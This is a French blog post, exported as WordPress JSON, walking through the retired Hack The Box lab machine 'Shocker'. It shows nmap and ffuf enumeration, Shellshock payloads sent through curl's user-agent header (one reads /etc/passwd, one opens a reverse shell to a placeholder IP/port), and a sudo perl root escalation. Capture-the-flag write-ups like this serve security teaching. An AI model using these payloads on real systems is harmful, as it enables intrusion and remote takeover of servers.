{"id":1898,"date":"2021-07-09T14:06:22","date_gmt":"2021-07-09T12:06:22","guid":{"rendered":"https:\/\/mikadmin.fr\/blog\/?p=1898"},"modified":"2021-09-19T01:50:39","modified_gmt":"2021-09-18T23:50:39","slug":"hackthebox-shocker","status":"publish","type":"post","link":"https:\/\/mikadmin.fr\/blog\/hackthebox-shocker\/","title":{"rendered":"HackTheBox : Shocker"},"content":{"rendered":"<\/span> 3<\/span> min read<\/span><\/span>

Views: 877<\/p>\n

<\/div>\n\n\n\n
\"shocker\"<\/figure><\/div>\n\n\n\n

Shocker<\/strong> est une machine HTB<\/strong> (Hack The Box) retir\u00e9e et qui est bas\u00e9e sur la vuln\u00e9rabilit\u00e9 ShellSock<\/a><\/strong>, dans cette machine nous n’utiliserons pas metasploit<\/strong>.<\/p>\n\n\n\n

<\/div>\n\n\n\n
\n\n\n\n

Shellshock<\/strong><\/em>, aussi appel\u00e9 Bashdoor<\/strong><\/em>, est une vuln\u00e9rabilit\u00e9 logicielle<\/a> pr\u00e9sente dans le shell<\/a> Unix<\/a> bash<\/a>. Elle a \u00e9t\u00e9 d\u00e9couverte en septembre 2014<\/a>1<\/a><\/sup>.<\/p>wikip\u00e9dia<\/cite><\/blockquote>\n\n\n\n

\n\n\n\n

Recon<\/h2>\n\n\n\n
<\/div>\n\n\n\n
nmap -A -T5 10.10.10.56<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
Enumeration<\/h2>\n\n\n\n
<\/div>\n\n\n\n
Nous ne trouvons rien de concret sur le site web nous amenant \u00e0 chercher de ce c\u00f4t\u00e9 \u00e0 l’aide de ffuf<\/span><\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
ffuf -u http:\/\/10.10.10.56\/FUZZ -c -w \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt -t 100<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Ce qui nous permet de trouver un dossier cgi-bin<\/span><\/strong> qui nous met la puce \u00e0 l’oreille concernant la vuln\u00e9rabilit\u00e9 \u00e9voqu\u00e9e plus haut, cependant il nous faut donc fuzz<\/strong> ce dernier afin de trouver un fichier int\u00e9ressant comme par exemple un fichier avec l’extension .sh<\/span><\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
ffuf -u http:\/\/10.10.10.56\/cgi-bin\/FUZZ -c -w \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt -e .sh -t 100<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
Exploitation<\/h2>\n\n\n\n
<\/div>\n\n\n\n
C’est l’heure de l’exploitation, afin de v\u00e9rifier si la cible est vuln\u00e9rable \u00e0 la vuln\u00e9rabilit\u00e9 ShellSock<\/strong>, nous avons besoin de ce petit one-liner<\/strong> qui renverra le contenu du fichier \/etc\/passwd<\/strong> si c’est positif.<\/p>\n\n\n\n
<\/div>\n\n\n\n
curl -H "user-agent: () { :; }; echo; echo; \/bin\/bash -c 'cat \/etc\/passwd'" http:\/\/10.10.10.56\/cgi-bin\/user.sh<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Dans notre cas la machine est bien vuln\u00e9rable et nous pouvons r\u00e9cup\u00e9rer un acc\u00e8s sur cette derni\u00e8re \u00e0 l’aide du payload<\/strong> suivant :<\/p>\n\n\n\n
<\/div>\n\n\n\n
curl -H "user-agent: () { :; }; echo; echo; \/bin\/bash -c 'bash -i >& \/dev\/tcp\/IP\/PORT 0>&1'" http:\/\/10.10.10.56\/cgi-bin\/user.sh<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
Privesc<\/h2>\n\n\n\n
<\/div>\n\n\n\n
Derni\u00e8re \u00e9tape nous devons passer de l’utilisateur shelly<\/strong> \u00e0 l’utilisateur root<\/a><\/strong>, apr\u00e8s tr\u00e8s peu de recherche nous remarquons que cette derni\u00e8re \u00e0 le droit d’ex\u00e9cuter le binaire perl<\/strong> en tant que root<\/strong> \u00e0 l’aide de sudo<\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Afin d’exploiter cette faiblesse, il nous suffit simplement d’utiliser le payload<\/strong> suivant :<\/p>\n\n\n\n
<\/div>\n\n\n\n
sudo perl -e 'exec "\/bin\/sh";'<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n","protected":false},"excerpt":{"rendered":"
<\/span>  3<\/span> min read<\/span><\/span>Shocker is a retired HTB (Hack The Box) machine that is based on the ShellSock vulnerability, in this machine we will not use metasploit. Continuer la lecture →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":1916,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[4],"tags":[21,66,9,45,67,63],"class_list":["post-1898","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-infosec","tag-ctf","tag-hackthebox","tag-linux","tag-pentest","tag-shellshock","tag-writeup"],"aioseo_notices":[],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/1898","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/comments?post=1898"}],"version-history":[{"count":0,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/1898\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media\/1916"}],"wp:attachment":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media?parent=1898"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/categories?post=1898"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/tags?post=1898"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}